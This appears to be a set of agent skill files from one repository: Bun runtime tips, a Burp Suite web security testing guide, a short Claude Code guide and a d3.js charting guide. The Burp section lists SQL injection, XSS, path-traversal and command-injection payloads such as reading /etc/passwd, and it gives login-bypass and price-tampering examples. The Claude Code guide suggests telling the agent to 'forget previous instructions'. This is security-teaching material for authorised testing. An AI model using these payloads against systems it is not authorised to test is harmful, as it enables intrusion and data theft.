Bun.resolveSync("pkg", process.cwd());
|
||||
|
||||
// ❌ These globals differ
|
||||
process.hrtime() // Use Bun.nanoseconds()
|
||||
setImmediate() // Use queueMicrotask()
|
||||
|
||||
// ✅ Bun-specific features
|
||||
const file = Bun.file("./data.txt"); // Fast file API
|
||||
Bun.serve({ port: 3000, fetch: ... }); // Fast HTTP server
|
||||
Bun.password.hash(password); // Built-in hashing
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 9. Performance Tips
|
||||
|
||||
### 9.1 Use Bun-native APIs
|
||||
|
||||
```typescript
|
||||
// Slow (Node.js compat)
|
||||
import fs from "fs/promises";
|
||||
const content = await fs.readFile("./data.txt", "utf-8");
|
||||
|
||||
// Fast (Bun-native)
|
||||
const file = Bun.file("./data.txt");
|
||||
const content = await file.text();
|
||||
```
|
||||
|
||||
### 9.2 Use Bun.serve for HTTP
|
||||
|
||||
```typescript
|
||||
// Don't: Express/Fastify (overhead)
|
||||
import express from "express";
|
||||
const app = express();
|
||||
|
||||
// Do: Bun.serve (native, 4-10x faster)
|
||||
Bun.serve({
|
||||
fetch(req) {
|
||||
return new Response("Hello!");
|
||||
},
|
||||
});
|
||||
|
||||
// Or use Elysia (Bun-optimized framework)
|
||||
import { Elysia } from "elysia";
|
||||
new Elysia().get("/", () => "Hello!").listen(3000);
|
||||
```
|
||||
|
||||
### 9.3 Bundle for Production
|
||||
|
||||
```bash
|
||||
# Always bundle and minify for production
|
||||
bun build ./src/index.ts --outdir ./dist --minify --target node
|
||||
|
||||
# Then run the bundle
|
||||
bun run ./dist/index.js
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Task | Command |
|
||||
| :----------- | :----------------------------------------- |
|
||||
| Init project | `bun init` |
|
||||
| Install deps | `bun install` |
|
||||
| Add package | `bun add <pkg>` |
|
||||
| Run script | `bun run <script>` |
|
||||
| Run file | `bun run file.ts` |
|
||||
| Watch mode | `bun --watch run file.ts` |
|
||||
| Run tests | `bun test` |
|
||||
| Build | `bun build ./src/index.ts --outdir ./dist` |
|
||||
| Execute pkg | `bunx <pkg>` |
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Bun Documentation](https://bun.sh/docs)
|
||||
- [Bun GitHub](https://github.com/oven-sh/bun)
|
||||
- [Elysia Framework](https://elysiajs.com/)
|
||||
- [Bun Discord](https://bun.sh/discord)
|
||||
|
||||
---
|
||||
name: Burp Suite Web Application Testing
|
||||
description: This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". It provides comprehensive guidance for using Burp Suite's core features for web application security testing.
|
||||
---
|
||||
|
||||
# Burp Suite Web Application Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Execute comprehensive web application security testing using Burp Suite's integrated toolset, including HTTP traffic interception and modification, request analysis and replay, automated vulnerability scanning, and manual testing workflows. This skill enables systematic discovery and exploitation of web application vulnerabilities through proxy-based testing methodology.
|
||||
|
||||
## Inputs / Prerequisites
|
||||
|
||||
### Required Tools
|
||||
- Burp Suite Community or Professional Edition installed
|
||||
- Burp's embedded browser or configured external browser
|
||||
- Target web application URL
|
||||
- Valid credentials for authenticated testing (if applicable)
|
||||
|
||||
### Environment Setup
|
||||
- Burp Suite launched with temporary or named project
|
||||
- Proxy listener active on 127.0.0.1:8080 (default)
|
||||
- Browser configured to use Burp proxy (or use Burp's browser)
|
||||
- CA certificate installed for HTTPS interception
|
||||
|
||||
### Editions Comparison
|
||||
| Feature | Community | Professional |
|
||||
|---------|-----------|--------------|
|
||||
| Proxy | ✓ | ✓ |
|
||||
| Repeater | ✓ | ✓ |
|
||||
| Intruder | Limited | Full |
|
||||
| Scanner | ✗ | ✓ |
|
||||
| Extensions | ✓ | ✓ |
|
||||
|
||||
## Outputs / Deliverables
|
||||
|
||||
### Primary Outputs
|
||||
- Intercepted and modified HTTP requests/responses
|
||||
- Vulnerability scan reports with remediation advice
|
||||
- HTTP history and site map documentation
|
||||
- Proof-of-concept exploits for identified vulnerabilities
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Intercepting HTTP Traffic
|
||||
|
||||
#### Launch Burp's Browser
|
||||
Navigate to integrated browser for seamless proxy integration:
|
||||
|
||||
1. Open Burp Suite and create/open project
|
||||
2. Go to **Proxy > Intercept** tab
|
||||
3. Click **Open Browser** to launch preconfigured browser
|
||||
4. Position windows to view both Burp and browser simultaneously
|
||||
|
||||
#### Configure Interception
|
||||
Control which requests are captured:
|
||||
|
||||
```
|
||||
Proxy > Intercept > Intercept is on/off toggle
|
||||
|
||||
When ON: Requests pause for review/modification
|
||||
When OFF: Requests pass through, logged to history
|
||||
```
|
||||
|
||||
#### Intercept and Forward Requests
|
||||
Process intercepted traffic:
|
||||
|
||||
1. Set intercept toggle to **Intercept on**
|
||||
2. Navigate to target URL in browser
|
||||
3. Observe request held in Proxy > Intercept tab
|
||||
4. Review request contents (headers, parameters, body)
|
||||
5. Click **Forward** to send request to server
|
||||
6. Continue forwarding subsequent requests until page loads
|
||||
|
||||
#### View HTTP History
|
||||
Access complete traffic log:
|
||||
|
||||
1. Go to **Proxy > HTTP history** tab
|
||||
2. Click any entry to view full request/response
|
||||
3. Sort by clicking column headers (# for chronological order)
|
||||
4. Use filters to focus on relevant traffic
|
||||
|
||||
### Phase 2: Modifying Requests

#### Intercept and Modify

Change request parameters before forwarding:

1. Enable interception: **Intercept on**
2. Trigger the target request in the browser
3. Locate the parameter to modify in the intercepted request
4. Edit the value directly in the request editor
5. Click **Forward** to send the modified request

#### Common Modification Targets

| Target | Example | Purpose |
|--------|---------|---------|
| Price parameters | `price=1` | Test business logic |
| User IDs | `userId=admin` | Test access control |
| Quantity values | `qty=-1` | Test input validation |
| Hidden fields | `isAdmin=true` | Test privilege escalation |

#### Example: Price Manipulation

```http
POST /cart HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

productId=1&quantity=1&price=100

# Modify to:
productId=1&quantity=1&price=1
```

Result: Item added to cart at the modified price.
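
The same tampering can be reproduced outside the proxy when scripting a proof of concept. A minimal sketch in Python (standard library only; the parameter names mirror the example above, and `override_param` is a hypothetical helper, not a Burp API):

```python
from urllib.parse import parse_qsl, urlencode

def override_param(body: str, name: str, value: str) -> str:
    """Rewrite one parameter in a URL-encoded request body, keeping order."""
    pairs = [(k, value if k == name else v) for k, v in parse_qsl(body)]
    return urlencode(pairs)

tampered = override_param("productId=1&quantity=1&price=100", "price", "1")
# tampered == "productId=1&quantity=1&price=1"
```

The rewritten body would then be replayed with any HTTP client to confirm the server accepts the client-supplied price.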
### Phase 3: Setting Target Scope

#### Define Scope

Focus testing on a specific target:

1. Go to **Target > Site map**
2. Right-click the target host in the left panel
3. Select **Add to scope**
4. When prompted, click **Yes** to exclude out-of-scope traffic

#### Filter by Scope

Remove noise from HTTP history:

1. Click the display filter above HTTP history
2. Select **Show only in-scope items**
3. History now shows only target site traffic

#### Scope Benefits

- Reduces clutter from third-party requests
- Prevents accidental testing of out-of-scope sites
- Improves scanning efficiency
- Creates cleaner reports
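
Conceptually, scope filtering is a host-matching test. A minimal sketch of the idea in Python (illustrative only; Burp's real scope engine also matches protocol, port, and path, and supports regex rules; the host set here is hypothetical):

```python
from urllib.parse import urlparse

IN_SCOPE_HOSTS = {"target.com"}  # hypothetical scope definition

def in_scope(url: str) -> bool:
    """True if the URL's host is a scoped host or one of its subdomains."""
    host = urlparse(url).hostname or ""
    return any(host == h or host.endswith("." + h) for h in IN_SCOPE_HOSTS)

in_scope("https://target.com/login")          # in scope
in_scope("https://cdn.analytics.example/a.js")  # filtered out
```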
### Phase 4: Using Burp Repeater

#### Send Request to Repeater

Prepare a request for manual testing:

1. Identify an interesting request in HTTP history
2. Right-click the request and select **Send to Repeater**
3. Go to the **Repeater** tab to access the request

#### Modify and Resend

Test different inputs efficiently:

```
1. View request in Repeater tab
2. Modify parameter values
3. Click Send to submit request
4. Review response in right panel
5. Use navigation arrows to review request history
```

#### Repeater Testing Workflow

```
Original Request:
GET /product?productId=1 HTTP/1.1

Test 1: productId=2 → Valid product response
Test 2: productId=999 → Not Found response
Test 3: productId=' → Error/exception response
Test 4: productId=1 OR 1=1 → SQL injection test
```

#### Analyze Responses

Look for indicators of vulnerabilities:

- Error messages revealing stack traces
- Framework/version information disclosure
- Different response lengths indicating logic flaws
- Timing differences suggesting blind injection
- Unexpected data in responses
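
The length-based check can be automated when triaging many responses. A minimal sketch (the 20% deviation threshold is an illustrative assumption, not a Burp setting):

```python
from statistics import median

def flag_anomalies(lengths, ratio=0.2):
    """Return indices of responses whose byte length deviates
    from the median by more than `ratio` of the median."""
    m = median(lengths)
    return [i for i, n in enumerate(lengths) if abs(n - m) > ratio * m]

flag_anomalies([5120, 5118, 5125, 9804, 5121])  # -> [3]
```

Response 3 stands out against the baseline; in practice that request would be the first one to inspect manually.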
### Phase 5: Running Automated Scans

#### Launch New Scan

Initiate vulnerability scanning (Professional only):

1. Go to the **Dashboard** tab
2. Click **New scan**
3. Enter the target URL in the **URLs to scan** field
4. Configure scan settings

#### Scan Configuration Options

| Mode | Description | Duration |
|------|-------------|----------|
| Lightweight | High-level overview | ~15 minutes |
| Fast | Quick vulnerability check | ~30 minutes |
| Balanced | Standard comprehensive scan | ~1-2 hours |
| Deep | Thorough testing | Several hours |

#### Monitor Scan Progress

Track scanning activity:

1. View task status in the **Dashboard**
2. Watch **Target > Site map** update in real time
3. Check the **Issues** tab for discovered vulnerabilities

#### Review Identified Issues

Analyze scan findings:

1. Select the scan task in the Dashboard
2. Go to the **Issues** tab
3. Click an issue to view:
   - **Advisory**: Description and remediation
   - **Request**: Triggering HTTP request
   - **Response**: Server response showing the vulnerability
### Phase 6: Intruder Attacks

#### Configure Intruder

Set up an automated attack:

1. Send a request to Intruder (right-click > Send to Intruder)
2. Go to the **Intruder** tab
3. Define payload positions using § markers
4. Select the attack type

#### Attack Types

| Type | Description | Use Case |
|------|-------------|----------|
| Sniper | Single position, iterate payloads | Fuzzing one parameter |
| Battering ram | Same payload all positions | Credential testing |
| Pitchfork | Parallel payload iteration | Username:password pairs |
| Cluster bomb | All payload combinations | Full brute force |

#### Configure Payloads

```
Positions Tab:
POST /login HTTP/1.1
...
username=§admin§&password=§password§

Payloads Tab:
Set 1: admin, user, test, guest
Set 2: password, 123456, admin, letmein
```
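
The four attack types differ only in how the payload sets are combined. A sketch of that combination logic using the payload sets above (illustrative of the pairing behaviour, not Burp's implementation):

```python
from itertools import product

users = ["admin", "user", "test", "guest"]
passwords = ["password", "123456", "admin", "letmein"]

# Pitchfork: parallel iteration over the sets (stops at the shorter set)
pitchfork = list(zip(users, passwords))          # 4 requests

# Cluster bomb: every combination across the sets
cluster_bomb = list(product(users, passwords))   # 16 requests

# Battering ram: the same payload inserted at every position
battering_ram = [(u, u) for u in users]          # 4 requests
```

The request counts explain why cluster bomb attacks grow multiplicatively with each added payload set.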
#### Analyze Results

Review attack output:

- Sort by response length to find anomalies
- Filter by status code for successful attempts
- Use grep to search for specific strings
- Export results for documentation
## Quick Reference

### Keyboard Shortcuts

| Action | Windows/Linux | macOS |
|--------|---------------|-------|
| Forward request | Ctrl+F | Cmd+F |
| Drop request | Ctrl+D | Cmd+D |
| Send to Repeater | Ctrl+R | Cmd+R |
| Send to Intruder | Ctrl+I | Cmd+I |
| Toggle intercept | Ctrl+T | Cmd+T |

### Common Testing Payloads

```
# SQL Injection
' OR '1'='1
' OR '1'='1'--
1 UNION SELECT NULL--

# XSS
<script>alert(1)</script>
"><img src=x onerror=alert(1)>
javascript:alert(1)

# Path Traversal
../../../etc/passwd
..\..\..\..\windows\win.ini

# Command Injection
; ls -la
| cat /etc/passwd
`whoami`
```

### Request Modification Tips

- Right-click for context menu options
- Use Decoder for encoding/decoding
- Compare requests using the Comparer tool
- Save interesting requests to the project
## Constraints and Guardrails

### Operational Boundaries

- Test only authorized applications
- Configure scope to prevent accidental out-of-scope testing
- Rate-limit scans to avoid denial of service
- Document all findings and actions

### Technical Limitations

- Community Edition lacks the automated scanner
- Some sites may block proxy traffic
- HSTS/certificate pinning may require additional configuration
- Heavy scanning may trigger WAF blocks

### Best Practices

- Always set target scope before extensive testing
- Use Burp's browser for reliable interception
- Save the project regularly to preserve work
- Review scan results manually for false positives
## Examples

### Example 1: Business Logic Testing

**Scenario**: E-commerce price manipulation

1. Add an item to the cart normally, intercept the request
2. Identify the `price=9999` parameter in the POST body
3. Modify to `price=1`
4. Forward the request
5. Complete checkout at the manipulated price

**Finding**: Server trusts client-provided price values.

### Example 2: Authentication Bypass

**Scenario**: Testing a login form

1. Submit valid credentials and capture the request
2. Send the request to Repeater for testing
3. Try: `username=admin' OR '1'='1'--`
4. Observe a successful login response

**Finding**: SQL injection in authentication.

### Example 3: Information Disclosure

**Scenario**: Error-based information gathering

1. Navigate to a product page, observe the `productId` parameter
2. Send the request to Repeater
3. Change `productId=1` to `productId=test`
4. Observe a verbose error revealing the framework version

**Finding**: Apache Struts 2.5.12 disclosed in a stack trace.
## Troubleshooting

### Browser Not Connecting Through Proxy

- Verify the proxy listener is active (Proxy > Options)
- Check browser proxy settings point to 127.0.0.1:8080
- Ensure no firewall is blocking local connections
- Use Burp's embedded browser for reliable setup

### HTTPS Interception Failing

- Install the Burp CA certificate in the browser/system
- Navigate to http://burp to download the certificate
- Add the certificate to trusted roots
- Restart the browser after installation

### Slow Performance

- Limit scope to reduce processing
- Disable unnecessary extensions
- Increase the Java heap size in startup options
- Close unused Burp tabs and features

### Requests Not Being Intercepted

- Verify "Intercept on" is enabled
- Check intercept rules aren't filtering the target
- Ensure the browser is using the Burp proxy
- Verify the target isn't using an unsupported protocol
skills/claude-code-guide/SKILL.md (new file, 68 lines)
---
name: Claude Code Guide
description: Master guide for using Claude Code effectively. Includes configuration templates, prompting strategies, "Thinking" keywords, debugging techniques, and best practices for interacting with the agent.
---

# Claude Code Guide

## Purpose

To provide a comprehensive reference for configuring and using Claude Code (the agentic coding tool) to its full potential. This skill synthesizes best practices, configuration templates, and advanced usage patterns.

## Configuration (`CLAUDE.md`)

When starting a new project, create a `CLAUDE.md` file in the root directory to guide the agent.

### Template (General)

```markdown
# Project Guidelines

## Commands

- Run app: `npm run dev`
- Test: `npm test`
- Build: `npm run build`

## Code Style

- Use TypeScript for all new code.
- Functional components with Hooks for React.
- Tailwind CSS for styling.
- Early returns for error handling.

## Workflow

- Read `README.md` first to understand project context.
- Before editing, read the file content.
- After editing, run tests to verify.
```

## Advanced Features

### Thinking Keywords

Use these keywords in your prompts to trigger deeper reasoning from the agent:

- "Think step-by-step"
- "Analyze the root cause"
- "Plan before executing"
- "Verify your assumptions"

### Debugging

If the agent is stuck or behaving unexpectedly:

1. **Clear Context**: Start a new session or ask the agent to "forget previous instructions" if confused.
2. **Explicit Instructions**: Be extremely specific about paths, filenames, and desired outcomes.
3. **Logs**: Ask the agent to "check the logs" or "run the command with verbose output".

## Best Practices

1. **Small Contexts**: Don't dump the entire codebase into the context. Use `grep` or `find` to locate relevant files first.
2. **Iterative Development**: Ask for small changes, verify, then proceed.
3. **Feedback Loop**: If the agent makes a mistake, correct it immediately and ask it to "add a lesson" to its memory (if supported) or `CLAUDE.md`.

## Reference

Based on [Claude Code Guide by zebbern](https://github.com/zebbern/claude-code-guide).
Submodule skills/claude-d3js-skill deleted from e198c87d03

skills/claude-d3js-skill/SKILL.md (new file, 820 lines)
---
name: d3-viz
description: Creating interactive data visualisations using d3.js. This skill should be used when creating custom charts, graphs, network diagrams, geographic visualisations, or any complex SVG-based data visualisation that requires fine-grained control over visual elements, transitions, or interactions. Use this for bespoke visualisations beyond standard charting libraries, whether in React, Vue, Svelte, vanilla JavaScript, or any other environment.
---

# D3.js Visualisation

## Overview

This skill provides guidance for creating sophisticated, interactive data visualisations using d3.js. D3.js (Data-Driven Documents) excels at binding data to DOM elements and applying data-driven transformations to create custom, publication-quality visualisations with precise control over every visual element. The techniques work across any JavaScript environment, including vanilla JavaScript, React, Vue, Svelte, and other frameworks.

## When to use d3.js

**Use d3.js for:**

- Custom visualisations requiring unique visual encodings or layouts
- Interactive explorations with complex pan, zoom, or brush behaviours
- Network/graph visualisations (force-directed layouts, tree diagrams, hierarchies, chord diagrams)
- Geographic visualisations with custom projections
- Visualisations requiring smooth, choreographed transitions
- Publication-quality graphics with fine-grained styling control
- Novel chart types not available in standard libraries

**Consider alternatives for:**

- 3D visualisations - use Three.js instead

## Core workflow

### 1. Set up d3.js

Import d3 at the top of your script:

```javascript
import * as d3 from 'd3';
```

Or use the CDN version (7.x):

```html
<script src="https://d3js.org/d3.v7.min.js"></script>
```

All modules (scales, axes, shapes, transitions, etc.) are accessible through the `d3` namespace.
### 2. Choose the integration pattern

**Pattern A: Direct DOM manipulation (recommended for most cases)**

Use d3 to select DOM elements and manipulate them imperatively. This works in any JavaScript environment:

```javascript
function drawChart(data) {
  if (!data || data.length === 0) return;

  const svg = d3.select('#chart'); // Select by ID, class, or DOM element

  // Clear previous content
  svg.selectAll("*").remove();

  // Set up dimensions
  const width = 800;
  const height = 400;
  const margin = { top: 20, right: 30, bottom: 40, left: 50 };

  // Create scales, axes, and draw visualisation
  // ... d3 code here ...
}

// Call when data changes
drawChart(myData);
```

**Pattern B: Declarative rendering (for frameworks with templating)**

Use d3 for data calculations (scales, layouts) but render elements via your framework:

```javascript
function getChartElements(data) {
  const xScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => d.value)])
    .range([0, 400]);

  return data.map((d, i) => ({
    x: 50,
    y: i * 30,
    width: xScale(d.value),
    height: 25
  }));
}

// In React: {getChartElements(data).map((d, i) => <rect key={i} {...d} fill="steelblue" />)}
// In Vue: v-for directive over the returned array
// In vanilla JS: Create elements manually from the returned data
```

Use Pattern A for complex visualisations with transitions, interactions, or when leveraging d3's full capabilities. Use Pattern B for simpler visualisations or when your framework prefers declarative rendering.
### 3. Structure the visualisation code

Follow this standard structure in your drawing function:

```javascript
function drawVisualization(data) {
  if (!data || data.length === 0) return;

  const svg = d3.select('#chart'); // Or pass a selector/element
  svg.selectAll("*").remove(); // Clear previous render

  // 1. Define dimensions
  const width = 800;
  const height = 400;
  const margin = { top: 20, right: 30, bottom: 40, left: 50 };
  const innerWidth = width - margin.left - margin.right;
  const innerHeight = height - margin.top - margin.bottom;

  // 2. Create main group with margins
  const g = svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`);

  // 3. Create scales
  const xScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => d.x)])
    .range([0, innerWidth]);

  const yScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => d.y)])
    .range([innerHeight, 0]); // Note: inverted for SVG coordinates

  // 4. Create and append axes
  const xAxis = d3.axisBottom(xScale);
  const yAxis = d3.axisLeft(yScale);

  g.append("g")
    .attr("transform", `translate(0,${innerHeight})`)
    .call(xAxis);

  g.append("g")
    .call(yAxis);

  // 5. Bind data and create visual elements
  g.selectAll("circle")
    .data(data)
    .join("circle")
    .attr("cx", d => xScale(d.x))
    .attr("cy", d => yScale(d.y))
    .attr("r", 5)
    .attr("fill", "steelblue");
}

// Call when data changes
drawVisualization(myData);
```
### 4. Implement responsive sizing

Make visualisations responsive to container size:

```javascript
function setupResponsiveChart(containerId, data) {
  const container = document.getElementById(containerId);
  const svg = d3.select(`#${containerId}`).append('svg');

  function updateChart() {
    const { width, height } = container.getBoundingClientRect();
    svg.attr('width', width).attr('height', height);

    // Redraw visualisation with new dimensions
    drawChart(data, svg, width, height);
  }

  // Update on initial load
  updateChart();

  // Update on window resize
  window.addEventListener('resize', updateChart);

  // Return cleanup function
  return () => window.removeEventListener('resize', updateChart);
}

// Usage:
// const cleanup = setupResponsiveChart('chart-container', myData);
// cleanup(); // Call when component unmounts or element removed
```

Or use ResizeObserver for more direct container monitoring:

```javascript
function setupResponsiveChartWithObserver(svgElement, data) {
  const observer = new ResizeObserver(() => {
    const { width, height } = svgElement.getBoundingClientRect();
    d3.select(svgElement)
      .attr('width', width)
      .attr('height', height);

    // Redraw visualisation
    drawChart(data, d3.select(svgElement), width, height);
  });

  observer.observe(svgElement.parentElement);
  return () => observer.disconnect();
}
```
## Common visualisation patterns

### Bar chart

```javascript
function drawBarChart(data, svgElement) {
  if (!data || data.length === 0) return;

  const svg = d3.select(svgElement);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 400;
  const margin = { top: 20, right: 30, bottom: 40, left: 50 };
  const innerWidth = width - margin.left - margin.right;
  const innerHeight = height - margin.top - margin.bottom;

  const g = svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`);

  const xScale = d3.scaleBand()
    .domain(data.map(d => d.category))
    .range([0, innerWidth])
    .padding(0.1);

  const yScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => d.value)])
    .range([innerHeight, 0]);

  g.append("g")
    .attr("transform", `translate(0,${innerHeight})`)
    .call(d3.axisBottom(xScale));

  g.append("g")
    .call(d3.axisLeft(yScale));

  g.selectAll("rect")
    .data(data)
    .join("rect")
    .attr("x", d => xScale(d.category))
    .attr("y", d => yScale(d.value))
    .attr("width", xScale.bandwidth())
    .attr("height", d => innerHeight - yScale(d.value))
    .attr("fill", "steelblue");
}

// Usage:
// drawBarChart(myData, document.getElementById('chart'));
```
### Line chart

```javascript
const line = d3.line()
  .x(d => xScale(d.date))
  .y(d => yScale(d.value))
  .curve(d3.curveMonotoneX); // Smooth curve

g.append("path")
  .datum(data)
  .attr("fill", "none")
  .attr("stroke", "steelblue")
  .attr("stroke-width", 2)
  .attr("d", line);
```

### Scatter plot

```javascript
g.selectAll("circle")
  .data(data)
  .join("circle")
  .attr("cx", d => xScale(d.x))
  .attr("cy", d => yScale(d.y))
  .attr("r", d => sizeScale(d.size)) // Optional: size encoding
  .attr("fill", d => colourScale(d.category)) // Optional: colour encoding
  .attr("opacity", 0.7);
```
### Chord diagram

A chord diagram shows relationships between entities in a circular layout, with ribbons representing flows between them:

```javascript
function drawChordDiagram(data) {
  // data format: array of objects with source, target, and value
  // Example: [{ source: 'A', target: 'B', value: 10 }, ...]

  if (!data || data.length === 0) return;

  const svg = d3.select('#chart');
  svg.selectAll("*").remove();

  const width = 600;
  const height = 600;
  const innerRadius = Math.min(width, height) * 0.3;
  const outerRadius = innerRadius + 30;

  // Create matrix from data
  const nodes = Array.from(new Set(data.flatMap(d => [d.source, d.target])));
  const matrix = Array.from({ length: nodes.length }, () => Array(nodes.length).fill(0));

  data.forEach(d => {
    const i = nodes.indexOf(d.source);
    const j = nodes.indexOf(d.target);
    matrix[i][j] += d.value;
    matrix[j][i] += d.value;
  });

  // Create chord layout
  const chord = d3.chord()
    .padAngle(0.05)
    .sortSubgroups(d3.descending);

  const arc = d3.arc()
    .innerRadius(innerRadius)
    .outerRadius(outerRadius);

  const ribbon = d3.ribbon()
    .source(d => d.source)
    .target(d => d.target);

  const colourScale = d3.scaleOrdinal(d3.schemeCategory10)
    .domain(nodes);

  const g = svg.append("g")
    .attr("transform", `translate(${width / 2},${height / 2})`);

  const chords = chord(matrix);

  // Draw ribbons
  g.append("g")
    .attr("fill-opacity", 0.67)
    .selectAll("path")
    .data(chords)
    .join("path")
    .attr("d", ribbon)
    .attr("fill", d => colourScale(nodes[d.source.index]))
    .attr("stroke", d => d3.rgb(colourScale(nodes[d.source.index])).darker());

  // Draw groups (arcs)
  const group = g.append("g")
    .selectAll("g")
    .data(chords.groups)
    .join("g");

  group.append("path")
    .attr("d", arc)
    .attr("fill", d => colourScale(nodes[d.index]))
    .attr("stroke", d => d3.rgb(colourScale(nodes[d.index])).darker());

  // Add labels
  group.append("text")
    .each(d => { d.angle = (d.startAngle + d.endAngle) / 2; })
    .attr("dy", "0.31em")
    .attr("transform", d => `rotate(${(d.angle * 180 / Math.PI) - 90})translate(${outerRadius + 30})${d.angle > Math.PI ? "rotate(180)" : ""}`)
    .attr("text-anchor", d => d.angle > Math.PI ? "end" : null)
    .text((d, i) => nodes[i])
    .style("font-size", "12px");
}
```
### Heatmap

A heatmap uses colour to encode values in a two-dimensional grid, useful for showing patterns across categories:

```javascript
function drawHeatmap(data) {
  // data format: array of objects with row, column, and value
  // Example: [{ row: 'A', column: 'X', value: 10 }, ...]

  if (!data || data.length === 0) return;

  const svg = d3.select('#chart');
  svg.selectAll("*").remove();

  const width = 800;
  const height = 600;
  const margin = { top: 100, right: 30, bottom: 30, left: 100 };
  const innerWidth = width - margin.left - margin.right;
  const innerHeight = height - margin.top - margin.bottom;

  // Get unique rows and columns
  const rows = Array.from(new Set(data.map(d => d.row)));
  const columns = Array.from(new Set(data.map(d => d.column)));

  const g = svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`);

  // Create scales
  const xScale = d3.scaleBand()
    .domain(columns)
    .range([0, innerWidth])
    .padding(0.01);

  const yScale = d3.scaleBand()
    .domain(rows)
    .range([0, innerHeight])
    .padding(0.01);

  // Colour scale for values
  const colourScale = d3.scaleSequential(d3.interpolateYlOrRd)
    .domain([0, d3.max(data, d => d.value)]);

  // Draw rectangles
  g.selectAll("rect")
    .data(data)
    .join("rect")
    .attr("x", d => xScale(d.column))
    .attr("y", d => yScale(d.row))
    .attr("width", xScale.bandwidth())
    .attr("height", yScale.bandwidth())
    .attr("fill", d => colourScale(d.value));

  // Add x-axis labels
  svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`)
    .selectAll("text")
    .data(columns)
    .join("text")
    .attr("x", d => xScale(d) + xScale.bandwidth() / 2)
    .attr("y", -10)
    .attr("text-anchor", "middle")
    .text(d => d)
    .style("font-size", "12px");

  // Add y-axis labels
  svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`)
    .selectAll("text")
    .data(rows)
    .join("text")
    .attr("x", -10)
    .attr("y", d => yScale(d) + yScale.bandwidth() / 2)
    .attr("dy", "0.35em")
    .attr("text-anchor", "end")
    .text(d => d)
    .style("font-size", "12px");

  // Add colour legend
  const legendWidth = 20;
  const legendHeight = 200;
  const legend = svg.append("g")
    .attr("transform", `translate(${width - 60},${margin.top})`);

  const legendScale = d3.scaleLinear()
    .domain(colourScale.domain())
    .range([legendHeight, 0]);

  const legendAxis = d3.axisRight(legendScale)
    .ticks(5);

  // Draw colour gradient in legend
  for (let i = 0; i < legendHeight; i++) {
    legend.append("rect")
      .attr("y", i)
      .attr("width", legendWidth)
      .attr("height", 1)
      .attr("fill", colourScale(legendScale.invert(i)));
  }

  legend.append("g")
    .attr("transform", `translate(${legendWidth},0)`)
    .call(legendAxis);
}
```
### Pie chart

```javascript
const pie = d3.pie()
  .value(d => d.value)
  .sort(null);

const arc = d3.arc()
  .innerRadius(0)
  .outerRadius(Math.min(width, height) / 2 - 20);

const colourScale = d3.scaleOrdinal(d3.schemeCategory10);

const g = svg.append("g")
  .attr("transform", `translate(${width / 2},${height / 2})`);

g.selectAll("path")
  .data(pie(data))
  .join("path")
  .attr("d", arc)
  .attr("fill", (d, i) => colourScale(i))
  .attr("stroke", "white")
  .attr("stroke-width", 2);
```
### Force-directed network

```javascript
const simulation = d3.forceSimulation(nodes)
  .force("link", d3.forceLink(links).id(d => d.id).distance(100))
  .force("charge", d3.forceManyBody().strength(-300))
  .force("center", d3.forceCenter(width / 2, height / 2));

const link = g.selectAll("line")
  .data(links)
  .join("line")
  .attr("stroke", "#999")
  .attr("stroke-width", 1);

const node = g.selectAll("circle")
  .data(nodes)
  .join("circle")
  .attr("r", 8)
  .attr("fill", "steelblue")
  .call(d3.drag()
    .on("start", dragstarted)
    .on("drag", dragged)
    .on("end", dragended));

simulation.on("tick", () => {
  link
    .attr("x1", d => d.source.x)
    .attr("y1", d => d.source.y)
    .attr("x2", d => d.target.x)
    .attr("y2", d => d.target.y);

  node
    .attr("cx", d => d.x)
    .attr("cy", d => d.y);
});

function dragstarted(event) {
  if (!event.active) simulation.alphaTarget(0.3).restart();
  event.subject.fx = event.subject.x;
  event.subject.fy = event.subject.y;
}

function dragged(event) {
  event.subject.fx = event.x;
  event.subject.fy = event.y;
}

function dragended(event) {
  if (!event.active) simulation.alphaTarget(0);
  event.subject.fx = null;
  event.subject.fy = null;
}
```
## Adding interactivity

### Tooltips

```javascript
// Create tooltip div (outside SVG)
const tooltip = d3.select("body").append("div")
  .attr("class", "tooltip")
  .style("position", "absolute")
  .style("visibility", "hidden")
  .style("background-color", "white")
  .style("border", "1px solid #ddd")
  .style("padding", "10px")
  .style("border-radius", "4px")
  .style("pointer-events", "none");

// Add to elements
circles
  .on("mouseover", function(event, d) {
    d3.select(this).attr("opacity", 1);
    tooltip
      .style("visibility", "visible")
      .html(`<strong>${d.label}</strong><br/>Value: ${d.value}`);
  })
  .on("mousemove", function(event) {
    tooltip
      .style("top", (event.pageY - 10) + "px")
      .style("left", (event.pageX + 10) + "px");
  })
  .on("mouseout", function() {
    d3.select(this).attr("opacity", 0.7);
    tooltip.style("visibility", "hidden");
  });
```
### Zoom and pan
|
||||
|
||||
```javascript
|
||||
const zoom = d3.zoom()
|
||||
.scaleExtent([0.5, 10])
|
||||
.on("zoom", (event) => {
|
||||
g.attr("transform", event.transform);
|
||||
});
|
||||
|
||||
svg.call(zoom);
|
||||
```
|
||||
|
||||
### Click interactions
|
||||
|
||||
```javascript
|
||||
circles
|
||||
.on("click", function(event, d) {
|
||||
// Handle click (dispatch event, update app state, etc.)
|
||||
console.log("Clicked:", d);
|
||||
|
||||
// Visual feedback
|
||||
d3.selectAll("circle").attr("fill", "steelblue");
|
||||
d3.select(this).attr("fill", "orange");
|
||||
|
||||
// Optional: dispatch custom event for your framework/app to listen to
|
||||
